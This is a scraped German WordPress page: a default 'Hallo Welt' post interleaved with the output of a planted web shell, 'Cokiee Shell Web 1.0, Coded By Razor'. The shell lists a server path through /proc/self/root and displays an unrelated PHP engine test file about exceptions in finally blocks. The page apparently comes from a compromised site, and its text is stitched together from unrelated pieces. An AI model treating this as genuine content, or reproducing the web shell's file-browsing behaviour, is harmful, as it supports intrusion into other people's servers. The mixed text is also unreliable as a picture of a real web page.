Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/Zend/tests/try/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/Zend/tests/try/try_finally_023.phpt |
--TEST-- Loop var dtor throwing exception during return inside try/catch inside finally --FILE-- <?php class Dtor { public function __destruct() { throw new Exception(2); } } function test() { try { throw new Exception(1); } finally { try { foreach ([new Dtor] as $v) { unset($v); return 42; } } catch (Exception $e) { } } } try { test(); } catch (Exception $e) { echo $e, "\n"; } ?> --EXPECTF-- Exception: 1 in %s:%d Stack trace: #0 %s(%d): test() #1 {main}
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare